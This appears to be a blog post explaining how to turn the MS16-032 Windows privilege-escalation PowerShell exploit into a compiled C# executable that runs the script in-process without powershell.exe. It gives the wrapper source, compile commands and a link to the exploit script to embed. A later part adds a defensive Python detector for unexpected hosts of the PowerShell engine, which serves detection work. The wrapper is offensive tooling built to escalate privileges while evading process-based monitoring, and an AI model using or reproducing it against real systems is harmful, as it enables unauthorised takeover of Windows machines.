Better to teach someone to fish than to give them a fish

The earlier MS16-032 was a PowerShell script; how do you turn it into an exe? Very simple: use .NET, make a few small changes, and compile. The modified code is here:

Click me

The gist seems to be blocked, so I am pasting it here as well:

/*
Author: Evilcg, Twitter: @Evilcg
Step One (locate the PowerShell engine assembly):
PS C:\> [psobject].Assembly.Location
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
Step Two (compile against it):
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:MS16_032.exe MS16_032.cs
*/

// Windows 10 reference may be here: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

namespace ConsoleApplication1
{
  class Program
  {
    static int Main(string[] args)
    {
      if (args.Length == 0 || args.Length > 2)
      {
        Console.WriteLine("Usage: MS16_032.exe calc.exe OR MS16_032.exe cmd.exe \"/c calc.exe\"");
        return 1;
      }

      // args[0] is the program to launch, args[1] (optional) is its command line
      string application = args[0];
      string commandline = args.Length == 2 ? args[1] : "";

      PowerShellExecutor executor = new PowerShellExecutor();
      executor.ExecuteSynchronously(application, commandline);
      return 0;
    }
  }

  class PowerShellExecutor
  {
    // The embedded script: the base64 encoding of the whole Invoke-MS16-032.ps1 file.
    // The string is left empty here; paste the base64 text between the quotes.
    public static string PSInvoke_MS16_032 =
      System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(@""));

    public void ExecuteSynchronously(string application, string commandline)
    {
      // Host the PowerShell engine in-process: no powershell.exe is started.
      InitialSessionState iss = InitialSessionState.CreateDefault();
      Runspace rs = RunspaceFactory.CreateRunspace(iss);
      rs.Open();
      PowerShell ps = PowerShell.Create();
      ps.Runspace = rs;

      // First script defines Invoke-MS16-032, second script calls it.
      ps.AddScript(PSInvoke_MS16_032);
      string command = "Invoke-MS16-032 -Application \"" + application + "\"";
      if (commandline != "")
      {
        command += " -Commandline \"" + commandline + "\"";
      }
      Console.WriteLine(command);
      ps.AddScript(command);
      ps.AddCommand("Out-Default");
      ps.Invoke();
      rs.Close();
    }
  }
}

The base64 content is the base64 encoding of the entire contents of https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 (you can use your own PowerShell script). Since the version I modified takes parameters, I wrote the simple C# code above to run the PowerShell script through .NET.

Compiling requires System.Management.Automation.dll; the exact steps are written in the .cs file, so compile it yourselves. I have only tested it on my own machine, nothing else. Test demo below:

http://static.wooyun.org/upload/image/201606/2016063013052815262.gif

Running PowerShell through .NET does not require powershell.exe. For details, see p0wnedShell or http://zone.wooyun.org/content/26831
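The defender's counterpart to the point above: because the engine is hosted in-process, there is no powershell.exe process to look for, but the host still has to load the engine assembly from the GAC. The following is an added detection example, not code from the original post or from p0wnedShell. It scans a constructed, simplified rendering of Sysmon Event ID 7 (Image loaded) records and flags any process outside an assumed allow list of expected hosts that loads System.Management.Automation.dll (or its native image, System.Management.Automation.ni.dll). The log format, the sample events and the allow list are all assumptions.

```python
"""Flag processes other than the expected PowerShell hosts that load the
PowerShell engine assembly (System.Management.Automation.dll).

Added example, not part of the original post. The log format is a constructed,
simplified rendering of Sysmon Event ID 7 (Image loaded); the host allow list is
an assumption and must be tuned per environment.
"""
import re
from typing import Dict, Iterable, List

# Assumed allow list of binaries that are expected to host the engine.
EXPECTED_HOSTS = {"powershell.exe", "powershell_ise.exe"}

# The engine ships as an IL assembly and as a native image (.ni.dll) in the GAC.
ENGINE_DLL = re.compile(r"\\system\.management\.automation(\.ni)?\.dll$", re.IGNORECASE)

# key=value pairs, values either double-quoted or a bare token
FIELD = re.compile(r"(\w+)=(\"[^\"]*\"|\S+)")


def parse_event(line: str) -> Dict[str, str]:
    """Turn 'EventID=7 Image="..." ImageLoaded="..."' into a dict (quotes stripped)."""
    return {k: v.strip('"') for k, v in FIELD.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_unexpected_hosts(lines: Iterable[str]) -> List[str]:
    """Return the process images that loaded the engine but are not expected hosts."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "7":
            continue  # only image-load events carry ImageLoaded
        if not ENGINE_DLL.search(ev.get("ImageLoaded", "")):
            continue  # some other DLL
        if basename(ev.get("Image", "")) not in EXPECTED_HOSTS:
            hits.append(ev["Image"])
    return hits


# Constructed sample events (not real telemetry).
SAMPLE = [
    'EventID=7 Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'ImageLoaded="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll"',
    'EventID=7 Image="C:\\Users\\demo\\Desktop\\MS16_032.exe" '
    'ImageLoaded="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll"',
    'EventID=7 Image="C:\\Users\\demo\\Desktop\\MS16_032.exe" '
    'ImageLoaded="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorlib.dll"',
    'EventID=1 Image="C:\\Users\\demo\\Desktop\\MS16_032.exe" CommandLine="MS16_032.exe calc.exe"',
]

if __name__ == "__main__":
    for image in find_unexpected_hosts(SAMPLE):
        print("PowerShell engine loaded by unexpected host:", image)
```

Two caveats when using this in practice: many legitimate products (management agents, server software, vendor tools) also host the engine, so the allow list needs tuning rather than a fixed list of two names; and since it is the real engine that runs, PowerShell script block logging, where enabled, still records the script text regardless of which process hosts it, so the image-load check complements that logging rather than replacing it.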

The version compiled under .NET 2.0 is here

Last edited by Evi1cg on 2017-01-17 16:15